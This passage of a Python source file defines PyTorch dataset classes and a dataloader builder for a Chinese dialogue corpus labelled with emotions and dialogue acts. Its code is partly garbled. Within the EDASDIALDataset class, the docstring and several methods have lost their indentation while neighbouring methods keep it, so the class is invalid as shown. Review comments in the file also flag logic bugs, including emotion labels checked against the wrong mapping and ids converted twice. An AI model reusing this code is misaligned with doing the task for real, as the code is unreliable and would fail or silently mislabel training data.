            for i in range(len(emotion_ids))]
class MMMTDDataset(Dataset):
    '''Torch Dataset over the MMMTD dialogue DataFrame produced by get_data.

    Each item is one dialogue: the last utterance is the response to predict,
    everything before it is history. Example encoding:
    word_tokens: [CLS] [speaker1] 您 好 [speaker2] 您 好 [speaker1] 再 见 [SEP]
    emotion_list: [[neutral], [neutral], [neutral]]
    da_list: [[greeting], [greeting], [greeting]]
    input_ids: [ 0, 13086, 448, 53, 13087, 448, 53, 13086, 154, 124, 2]
    if with_emotion==True:
    token_type_ids: [ 0, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102] # "[neutral]": 13102
    elif with_da==True:
    token_type_ids: [ 0, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088] # "[greeting]": 13088
    else:
    token_type_ids: [ 0, 13086, 13086, 13086, 13087, 13087, 13087, 13086, 13086, 13086, 13086]
    labels:
    '''
    def __init__(self,
                 data,
                 tokenizer,
                 emotion_type="Sentiment",
                 max_history=15,
                 batch_first=True,
                 lm_labels=True,
                 with_emotion=False,
                 with_da=False):
        # data: DataFrame with per-utterance rows, incl. a pre-tokenized "Token" column.
        self.data = data
        self.tokenizer = tokenizer
        self.emotion_type = emotion_type # "Sentiment" or "BaseEmotion" or "Emotion"
        # NOTE(review): da_size says 18 but DA_TOKENS defines 19 labels — confirm.
        self.da_size = 18 # Number of DA categories
        self.emotion_size = 3 # Number of emotion categories (overwritten just below)
        self.with_emotion=with_emotion # Whether use emotion to help generate dialogue
        self.with_da=with_da # Whether use DA to help generate dialogue
        # NOTE(review): sizes 7/15 do not match BASEEMOTION_TOKENS (1) /
        # EMOTION_TOKENS (13) defined above — confirm intended counts.
        if self.emotion_type=="Sentiment":
            self.emotion_size = 3
        elif self.emotion_type=="BaseEmotion":
            self.emotion_size = 7
        else: # "Emotion"
            self.emotion_size = 15
        self.max_history = max_history # Maximum number of dialogue sentences
        self.pad = tokenizer.pad_token_id
        self.batch_first = batch_first
        self.lm_labels = lm_labels
        # One dataset item per distinct dialogue id.
        self.keys = list(set(self.data['Dialogue_ID']))
        self.len = len(self.keys)
    def __len__(self):
        # Number of dialogues (not utterances).
        return self.len
    def __getitem__(self, index):
        """Build one training instance for the dialogue at `index`."""
        dialogue_id = self.keys[index]
        data_index = self.data[self.data['Dialogue_ID']==dialogue_id]
        # NOTE(review): both branches are identical except for `response`;
        # consider factoring the shared extraction out.
        if self.lm_labels: # for train and valid dataset
            speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
            utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
            emotion_list = self.convert_EMOTION_TO_TOKENS(data_index[self.emotion_type].tolist()[-2 * self.max_history:])
            emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
            da_list = self.convert_DA_TO_TOKENS(data_index["DA"].tolist()[-2 * self.max_history:])
            da_list = self.tokenizer.convert_tokens_to_ids(da_list)
            # The dialogue's final utterance is the generation target.
            response = data_index["Token"].tolist()[-1]
        else: # for test dataset
            speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
            utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
            emotion_list = self.convert_EMOTION_TO_TOKENS(data_index[self.emotion_type].tolist()[-2 * self.max_history:])
            emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
            da_list = self.convert_DA_TO_TOKENS(data_index["DA"].tolist()[-2 * self.max_history:])
            da_list = self.tokenizer.convert_tokens_to_ids(da_list)
            response = []
        return self.process(speaker_list, utterance_history, emotion_list, da_list, response)
    def create_speaker(self,speaker_list):
        """Map speaker names to "[speaker1]"/"[speaker2]" (first speaker is speaker1)."""
        speaker1 = speaker_list[0]
        new_speaker_list = []
        for speaker in speaker_list:
            if speaker==speaker1:
                new_speaker_list.append("[speaker1]")
            else:
                new_speaker_list.append("[speaker2]")
        return new_speaker_list
    def convert_EMOTION_TO_TOKENS(self,emotion_list):
        """Map emotion labels to token strings; unknown labels become "[UNK]".

        NOTE(review): every branch checks membership in SENTIMENT_TO_TOKENS
        but the BaseEmotion/Emotion branches index a different dict — valid
        emotion labels (e.g. "anger") become "[UNK]" and sentiment-only
        labels can raise KeyError. Same bug as the module-level function.
        """
        emotion_tokens_list = []
        if self.emotion_type=="Sentiment": # "Sentiment"
            for emo in emotion_list:
                if emo not in SENTIMENT_TO_TOKENS:
                    emotion_tokens_list.append("[UNK]")
                else:
                    emotion_tokens_list.append(SENTIMENT_TO_TOKENS[emo])
        elif self.emotion_type=="BaseEmotion": # "BaseEmotion"
            for emo in emotion_list:
                if emo not in SENTIMENT_TO_TOKENS:
                    emotion_tokens_list.append("[UNK]")
                else:
                    emotion_tokens_list.append(BASEEMOTION_TO_TOKENS[emo])
        else: # "Emotion"
            for emo in emotion_list:
                if emo not in SENTIMENT_TO_TOKENS:
                    emotion_tokens_list.append("[UNK]")
                else:
                    emotion_tokens_list.append(EMOTION_TO_TOKENS[emo])
        return emotion_tokens_list
    def convert_DA_TO_TOKENS(self,da_list):
        """Map dialogue-act labels to their special-token strings."""
        da_tokens_list = []
        for da in da_list:
            da_tokens_list.append(DA_TO_TOKENS[da])
        return da_tokens_list
    def process(self, speaker_list, history, emotion_list, da_list, response, with_eos=True):
        """Flatten history + response into model input tensors.

        Builds: [CLS], then each utterance prefixed by its speaker token,
        then the response (optionally terminated by [SEP]). token_type_ids
        repeat the utterance's speaker id over its tokens; lm_labels mask
        everything except the response tokens with -1.
        """
        bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
        speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
        instance = {}
        sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
        # Prefix every utterance (after [CLS]) with its speaker's token id.
        sequence = [sequence[0]] + [[speaker_list[i]] + s
                                    for i, s in enumerate(sequence[1:])]
        instance["input_ids"] = list(chain(*sequence))
        instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
                                              enumerate(sequence[1:])
                                              for _ in s]
        instance["lm_labels"] = [-1] * len(instance["input_ids"])
        if self.with_da:
            # One DA id repeated across each utterance's token span.
            instance["token_da_ids"] = [bos] + [da_list[i] for i, s in
                                                enumerate(sequence[1:])
                                                for _ in s]
        if self.with_emotion:
            # One emotion id repeated across each utterance's token span.
            instance["token_emotion_ids"] = [bos] + [emotion_list[i] for i, s in
                                                     enumerate(sequence[1:])
                                                     for _ in s]
        if self.lm_labels:
            # Mask all history plus the response's speaker prefix; supervise
            # only the actual response tokens.
            instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
        return instance
    def testdata_process(self, speaker_list, history, emotion_list, da_list, response, with_eos=True):
        """Identical to process(); kept as a separate entry point for test data.

        NOTE(review): exact duplicate of process() — consider delegating.
        """
        bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
        speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
        instance = {}
        sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
        sequence = [sequence[0]] + [[speaker_list[i]] + s
                                    for i, s in enumerate(sequence[1:])]
        instance["input_ids"] = list(chain(*sequence))
        instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
                                              enumerate(sequence[1:])
                                              for _ in s]
        instance["lm_labels"] = [-1] * len(instance["input_ids"])
        if self.with_da:
            instance["token_da_ids"] = [bos] + [da_list[i] for i, s in
                                                enumerate(sequence[1:])
                                                for _ in s]
        if self.with_emotion:
            instance["token_emotion_ids"] = [bos] + [emotion_list[i] for i, s in
                                                     enumerate(sequence[1:])
                                                     for _ in s]
        if self.lm_labels:
            instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
        return instance
    def collate(self, batch):
        """Pad a list of instances into batch tensors.

        Returns (input_ids, token_type_ids, labels); token_type_ids carry
        emotion ids, DA ids, or speaker ids depending on the flags (emotion
        takes precedence over DA).
        """
        input_ids = pad_sequence(
            [torch.tensor(instance["input_ids"], dtype=torch.long) for instance in batch],
            batch_first=self.batch_first, padding_value=self.pad)
        if self.with_emotion:
            token_type_ids = pad_sequence(
                [torch.tensor(instance["token_emotion_ids"], dtype=torch.long) for instance in batch],
                batch_first=self.batch_first, padding_value=self.pad)
        elif self.with_da:
            token_type_ids = pad_sequence(
                [torch.tensor(instance["token_da_ids"], dtype=torch.long) for instance in batch],
                batch_first=self.batch_first, padding_value=self.pad)
        else:
            token_type_ids = pad_sequence(
                [torch.tensor(instance["token_type_ids"], dtype=torch.long) for instance in batch],
                batch_first=self.batch_first, padding_value=self.pad)
        # Labels are padded with -1 so padding is ignored by the loss.
        labels = pad_sequence(
            [torch.tensor(instance["lm_labels"], dtype=torch.long) for instance in batch],
            batch_first=self.batch_first, padding_value=-1)
        return input_ids, token_type_ids, labels
class EDADIALDataset(Dataset):
    '''Dialogue Dataset variant that emits emotion ids and DA ids as separate
    tensors (instead of folding them into token_type_ids). Example:
    word_tokens: [CLS] [speaker1] 您 好 [speaker2] 您 好 [speaker1] 再 见 [SEP]
    emotion_list: [[neutral], [neutral], [neutral]]
    da_list: [[greeting], [greeting], [greeting]]
    input_ids: [ 0, 13086, 448, 53, 13087, 448, 53, 13086, 154, 124, 2]
    if with_emotion==True:
    emotion_ids:[ 0, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102] # "[neutral]": 13102
    if with_da==True:
    da_ids: [ 0, 13103, 13103, 13103, 13103, 13103, 13103, 13103, 13103, 13103, 13103] # "[greeting]": 13103
    token_type_ids: [ 0, 13103, 13086, 13086, 13087, 13087, 13087, 13086, 13086, 13086, 13086]
    labels:
    '''
    def __init__(self,
                 data,
                 tokenizer,
                 emotion_type="Sentiment",
                 max_history=15,
                 batch_first=True,
                 lm_labels=True,
                 with_emotion=False,
                 with_da=False):
        # data: DataFrame with per-utterance rows, incl. a pre-tokenized "Token" column.
        self.data = data
        self.tokenizer = tokenizer
        self.emotion_type = emotion_type # "Sentiment" or "BaseEmotion" or "Emotion"
        # NOTE(review): da_size says 18 but DA_TOKENS defines 19 labels — confirm.
        self.da_size = 18 # Number of DA categories
        self.emotion_size = 3 # Number of emotion categories (overwritten just below)
        self.with_emotion=with_emotion # Whether use emotion to help generate dialogue
        self.with_da=with_da # Whether use DA to help generate dialogue
        # NOTE(review): sizes 7/15 do not match BASEEMOTION_TOKENS (1) /
        # EMOTION_TOKENS (13) defined above — confirm intended counts.
        if self.emotion_type=="Sentiment":
            self.emotion_size = 3
        elif self.emotion_type=="BaseEmotion":
            self.emotion_size = 7
        else: # "Emotion"
            self.emotion_size = 15
        self.max_history = max_history # Maximum number of dialogue sentences
        self.pad = tokenizer.pad_token_id
        self.batch_first = batch_first
        self.lm_labels = lm_labels
        # One dataset item per distinct dialogue id.
        self.keys = list(set(self.data['Dialogue_ID']))
        self.len = len(self.keys)
    def __len__(self):
        # Number of dialogues (not utterances).
        return self.len
    def __getitem__(self, index):
        """Build one training instance for the dialogue at `index`."""
        dialogue_id = self.keys[index]
        data_index = self.data[self.data['Dialogue_ID']==dialogue_id]
        # NOTE(review): both branches are identical except for `response`.
        # Also: emotion_list/da_list are converted to ids here AND again in
        # process() below — calling convert_tokens_to_ids on ids twice looks
        # like a bug; confirm against the tokenizer's behavior.
        if self.lm_labels: # for train and valid dataset
            speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
            utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
            emotion_list = self.convert_EMOTION_TO_TOKENS(data_index[self.emotion_type].tolist()[-2 * self.max_history:])
            emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
            da_list = self.convert_DA_TO_TOKENS(data_index["DA"].tolist()[-2 * self.max_history:])
            da_list = self.tokenizer.convert_tokens_to_ids(da_list)
            # The dialogue's final utterance is the generation target.
            response = data_index["Token"].tolist()[-1]
        else: # for test dataset
            speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
            utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
            emotion_list = self.convert_EMOTION_TO_TOKENS(data_index[self.emotion_type].tolist()[-2 * self.max_history:])
            emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
            da_list = self.convert_DA_TO_TOKENS(data_index["DA"].tolist()[-2 * self.max_history:])
            da_list = self.tokenizer.convert_tokens_to_ids(da_list)
            response = []
        return self.process(speaker_list, utterance_history, emotion_list, da_list, response)
    def create_speaker(self,speaker_list):
        """Map speaker names to "[speaker1]"/"[speaker2]" (first speaker is speaker1)."""
        speaker1 = speaker_list[0]
        new_speaker_list = []
        for speaker in speaker_list:
            if speaker==speaker1:
                new_speaker_list.append("[speaker1]")
            else:
                new_speaker_list.append("[speaker2]")
        return new_speaker_list
    def convert_EMOTION_TO_TOKENS(self,emotion_list):
        """Map emotion labels to token strings; unknown labels become "[neutral]".

        NOTE(review): every branch checks membership in SENTIMENT_TO_TOKENS
        but the BaseEmotion/Emotion branches index a different dict — valid
        emotion labels (e.g. "anger") become "[neutral]" and sentiment-only
        labels can raise KeyError.
        """
        emotion_tokens_list = []
        if self.emotion_type=="Sentiment": # "Sentiment"
            for emo in emotion_list:
                if emo not in SENTIMENT_TO_TOKENS:
                    emotion_tokens_list.append("[neutral]")
                else:
                    emotion_tokens_list.append(SENTIMENT_TO_TOKENS[emo])
        elif self.emotion_type=="BaseEmotion": # "BaseEmotion"
            for emo in emotion_list:
                if emo not in SENTIMENT_TO_TOKENS:
                    emotion_tokens_list.append("[neutral]")
                else:
                    emotion_tokens_list.append(BASEEMOTION_TO_TOKENS[emo])
        else: # "Emotion"
            for emo in emotion_list:
                if emo not in SENTIMENT_TO_TOKENS:
                    emotion_tokens_list.append("[neutral]")
                else:
                    emotion_tokens_list.append(EMOTION_TO_TOKENS[emo])
        return emotion_tokens_list
    def convert_DA_TO_TOKENS(self,da_list):
        """Map dialogue-act labels to their special-token strings."""
        da_tokens_list = []
        for da in da_list:
            da_tokens_list.append(DA_TO_TOKENS[da])
        return da_tokens_list
    def process(self, speaker_list, history, emotion_list, da_list, response, with_eos=True):
        """Flatten history + response into model tensors with separate
        emotion_ids/da_ids streams (one id repeated over each utterance).

        NOTE(review): emotion_list/da_list arrive here already converted to
        ids by __getitem__, yet are passed through convert_tokens_to_ids
        again — likely a double-conversion bug.
        """
        bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
        speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
        emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
        da_list = self.tokenizer.convert_tokens_to_ids(da_list)
        instance = {}
        sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
        # Prefix every utterance (after [CLS]) with its speaker's token id.
        sequence = [sequence[0]] + [[speaker_list[i]] + s
                                    for i, s in enumerate(sequence[1:])]
        instance["input_ids"] = list(chain(*sequence))
        instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
                                              enumerate(sequence[1:])
                                              for _ in s]
        if self.with_da:
            instance["da_ids"] = [bos] + [da_list[i] for i, s in
                                          enumerate(sequence[1:])
                                          for _ in s]
        if self.with_emotion:
            instance["emotion_ids"] = [bos] + [emotion_list[i] for i, s in
                                               enumerate(sequence[1:])
                                               for _ in s]
        instance["lm_labels"] = [-1] * len(instance["input_ids"])
        if self.lm_labels:
            # Mask all history plus the response's speaker prefix; supervise
            # only the actual response tokens.
            instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
        return instance
    def testdata_process(self, speaker_list, history, emotion_list, da_list, response, with_eos=True):
        """Identical to process(); kept as a separate entry point for test data.

        NOTE(review): exact duplicate of process() — consider delegating.
        """
        bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
        speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
        emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
        da_list = self.tokenizer.convert_tokens_to_ids(da_list)
        instance = {}
        sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
        sequence = [sequence[0]] + [[speaker_list[i]] + s
                                    for i, s in enumerate(sequence[1:])]
        instance["input_ids"] = list(chain(*sequence))
        instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
                                              enumerate(sequence[1:])
                                              for _ in s]
        if self.with_da:
            instance["da_ids"] = [bos] + [da_list[i] for i, s in
                                          enumerate(sequence[1:])
                                          for _ in s]
        if self.with_emotion:
            instance["emotion_ids"] = [bos] + [emotion_list[i] for i, s in
                                               enumerate(sequence[1:])
                                               for _ in s]
        instance["lm_labels"] = [-1] * len(instance["input_ids"])
        if self.lm_labels:
            instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
        return instance
    def collate(self, batch):
        """Pad a list of instances into batch tensors.

        Returns (input_ids, token_type_ids, emotion_ids, da_ids, labels);
        emotion_ids/da_ids are None when the corresponding flag is off.
        """
        input_ids = pad_sequence(
            [torch.tensor(instance["input_ids"], dtype=torch.long) for instance in batch],
            batch_first=self.batch_first, padding_value=self.pad)
        if self.with_emotion:
            emotion_ids = pad_sequence(
                [torch.tensor(instance["emotion_ids"], dtype=torch.long) for instance in batch],
                batch_first=self.batch_first, padding_value=self.pad)
        else:
            emotion_ids = None
        if self.with_da:
            da_ids = pad_sequence(
                [torch.tensor(instance["da_ids"], dtype=torch.long) for instance in batch],
                batch_first=self.batch_first, padding_value=self.pad)
        else:
            da_ids = None
        token_type_ids = pad_sequence(
            [torch.tensor(instance["token_type_ids"], dtype=torch.long) for instance in batch],
            batch_first=self.batch_first, padding_value=self.pad)
        # Labels are padded with -1 so padding is ignored by the loss.
        labels = pad_sequence(
            [torch.tensor(instance["lm_labels"], dtype=torch.long) for instance in batch],
            batch_first=self.batch_first, padding_value=-1)
        return input_ids, token_type_ids, emotion_ids, da_ids, labels
class EDASDIALDataset(Dataset):
'''
word_tokens: [CLS] [speaker1] 您 好 [speaker2] 您 好 [speaker1] 再 见 [SEP]
emotion_list: [[neutral], [neutral], [neutral]]
da_list: [[greeting], [greeting], [greeting]]
input_ids: [ 0, 13086, 448, 53, 13087, 448, 53, 13086, 154, 124, 2]
if with_emotion==True:
emotion_ids:[ 0, 13102, -1, -1, 13102, -1, -1, 13102, -1, -1, -1] # "[neutral]": 13102
if with_da==True:
da_ids: [ 0, 13103, -1, -1, 13103, -1, -1, 13103, -1, -1, -1] # "[greeting]": 13103
token_type_ids: [ 0, 13103, 13086, 13086, 13087, 13087, 13087, 13086, 13086, 13086, 13086]
labels:
'''
    def __init__(self,
                 data,
                 tokenizer,
                 emotion_type="Sentiment",
                 max_history=15,
                 batch_first=True,
                 lm_labels=True,
                 with_emotion=False,
                 with_da=False):
        # data: DataFrame with per-utterance rows, incl. a pre-tokenized "Token" column.
        self.data = data
        self.tokenizer = tokenizer
        self.emotion_type = emotion_type # "Sentiment" or "BaseEmotion" or "Emotion"
        # NOTE(review): da_size says 18 but DA_TOKENS defines 19 labels — confirm.
        self.da_size = 18 # Number of DA categories
        self.emotion_size = 3 # Number of emotion categories (overwritten just below)
        self.with_emotion=with_emotion # Whether use emotion to help generate dialogue
        self.with_da=with_da # Whether use DA to help generate dialogue
        # NOTE(review): sizes 7/15 do not match BASEEMOTION_TOKENS (1) /
        # EMOTION_TOKENS (13) defined above — confirm intended counts.
        if self.emotion_type=="Sentiment":
            self.emotion_size = 3
        elif self.emotion_type=="BaseEmotion":
            self.emotion_size = 7
        else: # "Emotion"
            self.emotion_size = 15
        self.max_history = max_history # Maximum number of dialogue sentences
        self.pad = tokenizer.pad_token_id
        self.batch_first = batch_first
        self.lm_labels = lm_labels
        # One dataset item per distinct dialogue id.
        self.keys = list(set(self.data['Dialogue_ID']))
        self.len = len(self.keys)
    def __len__(self):
        # Number of dialogues (not utterances).
        return self.len
    def __getitem__(self, index):
        """Build one training instance for the dialogue at `index`."""
        dialogue_id = self.keys[index]
        data_index = self.data[self.data['Dialogue_ID']==dialogue_id]
        # NOTE(review): both branches are identical except for `response`;
        # emotion_list/da_list are converted to ids here and appear to be
        # converted again inside process() — confirm for double conversion.
        if self.lm_labels: # for train and valid dataset
            speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
            utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
            emotion_list = self.convert_EMOTION_TO_TOKENS(data_index[self.emotion_type].tolist()[-2 * self.max_history:])
            emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
            da_list = self.convert_DA_TO_TOKENS(data_index["DA"].tolist()[-2 * self.max_history:])
            da_list = self.tokenizer.convert_tokens_to_ids(da_list)
            # The dialogue's final utterance is the generation target.
            response = data_index["Token"].tolist()[-1]
        else: # for test dataset
            speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
            utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
            emotion_list = self.convert_EMOTION_TO_TOKENS(data_index[self.emotion_type].tolist()[-2 * self.max_history:])
            emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
            da_list = self.convert_DA_TO_TOKENS(data_index["DA"].tolist()[-2 * self.max_history:])
            da_list = self.tokenizer.convert_tokens_to_ids(da_list)
            response = []
        return self.process(speaker_list, utterance_history, emotion_list, da_list, response)
def create_speaker(self,speaker_list):
speaker1 = speaker_list[0]
new_speaker_list = []
for speaker in speaker_list:
if speaker==speaker1:
new_speaker_list.append("[speaker1]")
else:
new_speaker_list.append("[speaker2]")
return new_speaker_list
def convert_EMOTION_TO_TOKENS(self,emotion_list):
emotion_tokens_list = []
if self.emotion_type=="Sentiment": # "Sentiment"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[neutral]")
else:
emotion_tokens_list.append(SENTIMENT_TO_TOKENS[emo])
elif self.emotion_type=="BaseEmotion": # "BaseEmotion"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[neutral]")
else:
emotion_tokens_list.append(BASEEMOTION_TO_TOKENS[emo])
else: # "Emotion"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[neutral]")
else:
emotion_tokens_list.append(EMOTION_TO_TOKENS[emo])
return emotion_tokens_list
def convert_DA_TO_TOKENS(self,da_list):
da_tokens_list = []
for da in da_list:
da_tokens_list.append(DA_TO_TOKENS[da])
return da_tokens_list
def set_da_in_speaker(self,da_ids,input_ids,bos, eos, speaker1, speaker2):
special_token_ids_list = [bos, eos, speaker1, speaker2]
new_da_ids = []
for i,da in enumerate(da_ids):
if input_ids[i] in special_token_ids_list:
new_da_ids.append(da_ids[i])
else:
new_da_ids.append(self.pad)
return new_da_ids
def set_emotion_in_speaker(self,emotion_ids,input_ids,bos, eos, speaker1, speaker2):
special_token_ids_list = [bos, eos, speaker1, speaker2]
new_emotion_ids = []
for i,emotion in enumerate(emotion_ids):
if input_ids[i] in special_token_ids_list:
new_emotion_ids.append(emotion_ids[i])
else:
new_emotion_ids.append(self.pad)
return new_emotion_ids
    def process(self, speaker_list, history, emotion_list, da_list, response, with_eos=True):
        """Build a single model instance from a dialogue.

        Produces a dict with "input_ids", "token_type_ids", optional
        "da_ids"/"emotion_ids" (gated by self.with_da/self.with_emotion),
        and "lm_labels" where only the response tokens are unmasked.
        """
        bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
        speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
        # NOTE(review): __getitem__ already converted emotion_list/da_list to
        # ids before calling process; converting them again here looks
        # redundant and possibly lossy — confirm tokenizer behavior on ints.
        emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
        da_list = self.tokenizer.convert_tokens_to_ids(da_list)
        instance = {}
        # sequence = [[bos], turn_1, ..., turn_n, response(+eos)]; each turn
        # after the first is prefixed with its speaker token.
        sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
        sequence = [sequence[0]] + [[speaker_list[i]] + s
                                    for i, s in enumerate(sequence[1:])]
        instance["input_ids"] = list(chain(*sequence))
        # token_type_ids: every token of turn i carries that turn's speaker id.
        instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
                                              enumerate(sequence[1:])
                                              for _ in s]
        if self.with_da:
            # Broadcast each turn's DA id over all its tokens...
            instance["da_ids"] = [bos] + [da_list[i] for i, s in
                                          enumerate(sequence[1:])
                                          for _ in s]
            # only set the DA in [speaker1] or [speaker2]
            instance["da_ids"] = self.set_da_in_speaker(instance["da_ids"],instance["input_ids"],bos, eos, speaker1, speaker2)
        if self.with_emotion:
            # Same broadcast for emotion ids...
            instance["emotion_ids"] = [bos] + [emotion_list[i] for i, s in
                                               enumerate(sequence[1:])
                                               for _ in s]
            # only set the emotion in [speaker1] or [speaker2]
            instance["emotion_ids"] = self.set_emotion_in_speaker(instance["emotion_ids"],instance["input_ids"],bos, eos, speaker1, speaker2)
        # Default: everything masked out of the LM loss.
        instance["lm_labels"] = [-1] * len(instance["input_ids"])
        if self.lm_labels:
            # Unmask only the response (last segment), skipping its leading
            # speaker token.
            instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
        return instance
    def testdata_process(self, speaker_list, history, emotion_list, da_list, response, with_eos=True):
        """Build a model instance for test data.

        NOTE(review): this body is byte-identical to :meth:`process`, and
        ``__getitem__`` calls ``process`` even for test data — this method
        appears to be dead/duplicated code; confirm before removing.
        """
        bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
        speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
        emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
        da_list = self.tokenizer.convert_tokens_to_ids(da_list)
        instance = {}
        sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
        sequence = [sequence[0]] + [[speaker_list[i]] + s
                                    for i, s in enumerate(sequence[1:])]
        instance["input_ids"] = list(chain(*sequence))
        instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
                                              enumerate(sequence[1:])
                                              for _ in s]
        if self.with_da:
            instance["da_ids"] = [bos] + [da_list[i] for i, s in
                                          enumerate(sequence[1:])
                                          for _ in s]
            # only set the DA in [speaker1] or [speaker2]
            instance["da_ids"] = self.set_da_in_speaker(instance["da_ids"],instance["input_ids"],bos, eos, speaker1, speaker2)
        if self.with_emotion:
            instance["emotion_ids"] = [bos] + [emotion_list[i] for i, s in
                                               enumerate(sequence[1:])
                                               for _ in s]
            # only set the emotion in [speaker1] or [speaker2]
            instance["emotion_ids"] = self.set_emotion_in_speaker(instance["emotion_ids"],instance["input_ids"],bos, eos, speaker1, speaker2)
        instance["lm_labels"] = [-1] * len(instance["input_ids"])
        if self.lm_labels:
            instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
        return instance
def collate(self, batch):
input_ids = pad_sequence(
[torch.tensor(instance["input_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
if self.with_emotion:
emotion_ids = pad_sequence(
[torch.tensor(instance["emotion_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
else:
emotion_ids = None
if self.with_da:
da_ids = pad_sequence(
[torch.tensor(instance["da_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
else:
da_ids = None
token_type_ids = pad_sequence(
[torch.tensor(instance["token_type_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
labels = pad_sequence(
[torch.tensor(instance["lm_labels"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=-1)
return input_ids, token_type_ids, emotion_ids, da_ids, labels
def build_dataloaders(args, tokenizer, logger, load_test=False):
    """Construct MMMTDDataset dataloaders.

    With ``load_test=False`` returns ``(train_loader, valid_loader,
    train_sampler, valid_sampler)``; with ``load_test=True`` returns
    ``(test_loader, test_sampler)``.  Distributed samplers are used when
    ``args.distributed`` is set.
    """
    def _dataset(frame):
        # Every split shares the same dataset configuration.
        return MMMTDDataset(data=frame,
                            tokenizer=tokenizer,
                            emotion_type=args.emotion_type,
                            max_history=args.max_history,
                            batch_first=True,
                            lm_labels=True,
                            with_emotion=args.with_emotion,
                            with_da=args.with_da)

    def _sampler(dataset):
        return torch.utils.data.distributed.DistributedSampler(dataset) if args.distributed else None

    if load_test:
        logger.info("Build test dataloaders")
        test_data, test_samples = get_data(args, tokenizer, args.test_path, logger)
        test_dataset = _dataset(test_data)
        test_sampler = _sampler(test_dataset)
        test_loader = DataLoader(test_dataset,
                                 sampler=test_sampler,
                                 collate_fn=test_dataset.collate,
                                 num_workers=args.num_workers,
                                 batch_size=args.test_batch_size,
                                 shuffle=False)
        return test_loader, test_sampler

    logger.info("Build train and validation dataloaders")
    train_data, train_samples = get_data(args, tokenizer, args.train_path, logger)
    valid_data, valid_samples = get_data(args, tokenizer, args.valid_path, logger)
    train_dataset = _dataset(train_data)
    valid_dataset = _dataset(valid_data)
    train_sampler = _sampler(train_dataset)
    valid_sampler = _sampler(valid_dataset)
    # Shuffling is delegated to the DistributedSampler when distributed.
    train_loader = DataLoader(train_dataset,
                              sampler=train_sampler,
                              collate_fn=train_dataset.collate,
                              num_workers=args.num_workers,
                              batch_size=args.train_batch_size,
                              shuffle=(not args.distributed))
    valid_loader = DataLoader(valid_dataset,
                              sampler=valid_sampler,
